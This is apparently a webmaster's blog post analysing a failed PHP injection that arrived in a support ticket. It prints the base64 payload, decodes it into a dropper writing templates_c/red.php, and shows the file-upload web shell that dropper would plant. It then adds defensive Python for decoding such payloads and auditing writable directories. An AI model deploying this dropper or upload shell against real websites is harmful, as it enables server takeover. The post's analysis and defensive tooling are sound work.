
When they hacked my website

So… The other day someone tried to hack one of my websites – not this one, another one – which shall remain nameless in case naming it is seen as some kind of challenge(!). As it happens I’m up on these things, particularly on the website in question, so my installation was very secure – I had followed all the necessary security measures and the hacking attempt was unsuccessful. So what did they do?

Well actually, they raised a support ticket containing a PHP injection script. What’s one of those? It’s one of these:

 {php#}eval(base64_decode('JGMzbyA9IGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFOQ21WamFHOGdKenhtYjNKdElHRmpkR2x2YmowaUlpQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW0xMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFaUlHNWhiV1U5SW5Wd2JHOWhaR1Z5SWlCcFpEMGlkWEJzYjJGa1pYSWlQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYm1GdFpUMGlabWxzWlNJZ2MybDZaVDBpTlRBaVBqeHBibkIxZENCdVlXMWxQU0pmZFhCc0lpQjBlWEJsUFNKemRXSnRhWFFpSUdsa1BTSmZkWEJzSWlCMllXeDFaVDBpVlhCc2IyRmtJajQ4TDJadmNtMCtKenNOQ21sbUtDQWtYMUJQVTFSYkoxOTFjR3duWFNBOVBTQWlWWEJzYjJGa0lpQXBJSHNOQ2dscFppaEFZMjl3ZVNna1gwWkpURVZUV3lkbWFXeGxKMTFiSjNSdGNGOXVZVzFsSjEwc0lDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmJtRnRaU2RkS1NrZ2V5QmxZMmh2SUNjOFlqNVZjR3h2WVdRZ1UxVkxVMFZUSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNnbGxiSE5sSUhzZ1pXTm9ieUFuUEdJK1ZYQnNiMkZrSUVkQlIwRk1JQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBOQ24wTkNqOCsiKTsNCiRyZWQgPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkcmVkLCRjM28pOw=='));{/php#} 

It’s very simple. It asks the server to invoke the PHP interpreter (although I’ve added hashes to prevent it from running anything untoward) and decode the (apparently gobbledy-gook) string.

It’s not gobbledy-gook of course, just obscured with Base64 encoding so that it can’t be read as natural language at a glance.

This first step failed miserably, but I thought it would be a good idea to run through the script and find out what would have happened if it had worked. So I decoded the string – and it comes out as a little more code and still more gobbledy-gook, like this:

$c3o = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
$red = fopen("templates_c/red.php","w");
fwrite($red,$c3o);


Now we can begin to see what it will do. It sets a string variable ($c3o) to another decoded string and tries to write it to the file system as “templates_c/red.php”. That never happened here, but if it had, they would have been able to run the decoded script simply by browsing to www.thewebsitetheytriedtohack.com/templates_c/red.php. So what would have happened if they had done that? Well, decoding that last little gobbledy-gook string gives us a natty little form:

<#php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
	else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
#>

Basically it gives you a button to upload a file to the server. If it works it tells you “Upload SUKSES !!!”; if it fails, it tells you “Upload GAGAL !!!”. That would allow a human user to navigate to the form, upload anything they liked and run it on my webserver – which might be a spambot, or simply a PHP database query to steal information; all manner of possibilities.
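The decoding I did by hand above is easy to automate, and it is worth doing for anything pasted into a support ticket before a human reads (or pastes) it anywhere. The script below is an added example of mine, not code from the post or from the software I run; it is in Python rather than PHP because it only analyses the text and never executes it. It peels the nested base64 layers off the payload quoted above (embedded here as a constructed ticket body, with my “{php#}” neutering braces left off since nothing is evaluated) and reports, per stage, which dangerous PHP constructs appear and which path the script tries to write to.

```python
import base64
import binascii
import re

# Constructed sample: the stage-0 payload quoted in the post, as it would
# arrive in a support-ticket body. Nothing here is ever executed.
TICKET_TEXT = (
    "Hi, my page shows this error, please advise: "
    "eval(base64_decode('JGMzbyA9IGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFOQ21WamFHOGdKenhtYjNKdElHRmpkR2x2YmowaUlpQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW0xMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFaUlHNWhiV1U5SW5Wd2JHOWhaR1Z5SWlCcFpEMGlkWEJzYjJGa1pYSWlQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYm1GdFpUMGlabWxzWlNJZ2MybDZaVDBpTlRBaVBqeHBibkIxZENCdVlXMWxQU0pmZFhCc0lpQjBlWEJsUFNKemRXSnRhWFFpSUdsa1BTSmZkWEJzSWlCMllXeDFaVDBpVlhCc2IyRmtJajQ4TDJadmNtMCtKenNOQ21sbUtDQWtYMUJQVTFSYkoxOTFjR3duWFNBOVBTQWlWWEJzYjJGa0lpQXBJSHNOQ2dscFppaEFZMjl3ZVNna1gwWkpURVZUV3lkbWFXeGxKMTFiSjNSdGNGOXVZVzFsSjEwc0lDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmJtRnRaU2RkS1NrZ2V5QmxZMmh2SUNjOFlqNVZjR3h2WVdRZ1UxVkxVMFZUSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNnbGxiSE5sSUhzZ1pXTm9ieUFuUEdJK1ZYQnNiMkZrSUVkQlIwRk1JQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBOQ24wTkNqOCsiKTsNCiRyZWQgPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkcmVkLCRjM28pOw=='));"
)

# Stage 0 pattern as seen in the ticket, then any base64_decode("...")
# call found inside an already-decoded stage.
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
ANY_B64 = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
FOPEN_PATH = re.compile(r"fopen\s*\(\s*['\"]([^'\"]+)['\"]")

# PHP constructs worth flagging to whoever triages the ticket.
INDICATORS = {
    "eval(": "dynamic code execution",
    "fopen(": "opens a file handle",
    "fwrite(": "writes to the filesystem",
    "$_FILES": "handles an HTTP file upload",
    "copy(": "copies a file (typically the uploaded temp file)",
    "move_uploaded_file(": "moves an uploaded file into place",
    "system(": "runs a shell command",
}


def decode_layers(text, max_depth=5):
    """Peel base64 layers off a submitted string.

    Returns a list of stages: stages[0] is the raw text and stages[n] is the
    decoded content of the base64 blob found in stages[n-1]. Stops when no
    blob is found, the blob is not valid base64, or max_depth is reached.
    """
    stages = [text]
    current = text
    for _ in range(max_depth):
        match = EVAL_B64.search(current) or ANY_B64.search(current)
        if not match:
            break
        try:
            decoded = base64.b64decode(match.group(1), validate=True)
        except binascii.Error:
            break  # not real base64, so there is no further layer
        current = decoded.decode("utf-8", errors="replace")
        stages.append(current)
    return stages


def find_indicators(stage):
    """Descriptions of every flagged construct present in one stage."""
    return sorted(desc for needle, desc in INDICATORS.items() if needle in stage)


def triage(text):
    """Per-stage summary: indicators found and any path handed to fopen()."""
    return [
        {
            "stage": i,
            "indicators": find_indicators(stage),
            "written_paths": FOPEN_PATH.findall(stage),
        }
        for i, stage in enumerate(decode_layers(text))
    ]


if __name__ == "__main__":
    for entry in triage(TICKET_TEXT):
        print(entry)
```

Run against the sample it reports three stages: the eval in the ticket itself, the dropper that opens templates_c/red.php for writing, and the upload form that handles $_FILES and copies the uploaded file into place. The same three-stage shape (eval, file write, upload handler) is what to look for in anything else that arrives base64-wrapped.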


But if nothing else – this post should demonstrate the importance of getting your folder and directory access secure and LOCKED DOWN.


Write access should be disabled unless it’s essential. Fascinating how our (Malay, I believe) hacking compadres go about their work!!!!
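Checking that advice is worth automating too, because the dropper only needed one directory the web server could write to. The script below is an added example of mine, not part of the post or of any CMS: it walks a document root, reports every directory writable by group or others that is not on an allow-list of directories that genuinely need write access, and separately reports any PHP file sitting inside a writable directory, allow-listed or not, since that is exactly where a dropped red.php would land. The tree it audits is a constructed sample built in a temp directory (a read-only includes/, a legitimately writable uploads/, and a world-writable templates_c/ containing red.php); the allow-list is an assumption for the demo.

```python
import os
import shutil
import stat
import tempfile

PHP_SUFFIXES = (".php", ".phtml", ".php5")


def audit_webroot(root, writable_allowed=()):
    """Walk a document root and report two kinds of finding.

    ("writable-dir", path)          directory writable by group or others
                                     that is not on the allow-list
    ("php-in-writable-dir", path)   PHP file inside any group/other-writable
                                     directory, allow-listed or not
    Paths are relative to root; the root itself is reported as "".
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        rel = "" if rel == "." else rel
        mode = os.stat(dirpath).st_mode
        if not mode & (stat.S_IWGRP | stat.S_IWOTH):
            continue  # owner-only write: nothing to report here
        if rel not in writable_allowed:
            findings.append(("writable-dir", rel))
        for name in filenames:
            if name.lower().endswith(PHP_SUFFIXES):
                findings.append(("php-in-writable-dir", os.path.join(rel, name)))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample layout (not the author's site) in a temp directory."""
    root = tempfile.mkdtemp(prefix="webroot-")
    layout = {
        "includes": (0o755, ["config.php"]),    # read-only application code
        "uploads": (0o775, ["photo.jpg"]),      # legitimately needs write access
        "templates_c": (0o777, ["red.php"]),    # world-writable, holds the dropped file
    }
    for dirname, (mode, files) in layout.items():
        path = os.path.join(root, dirname)
        os.mkdir(path)
        for fname in files:
            with open(os.path.join(path, fname), "w") as fh:
                fh.write("placeholder\n")
        os.chmod(path, mode)  # set after creating files so umask does not interfere
    os.chmod(root, 0o755)
    return root


def run_demo():
    """Build the sample tree, audit it with 'uploads' allow-listed, clean up."""
    root = build_sample_tree()
    try:
        return audit_webroot(root, writable_allowed=("uploads",))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for kind, path in run_demo():
        print(f"{kind:22} {path}")
```

On the sample it flags templates_c both as an unexpected writable directory and for the red.php inside it, and stays quiet about uploads because that directory is allow-listed and holds no PHP. Where a writable directory must contain PHP (compiled-template directories are the usual case), the fix is to stop the web server executing scripts from that directory rather than to remove the files.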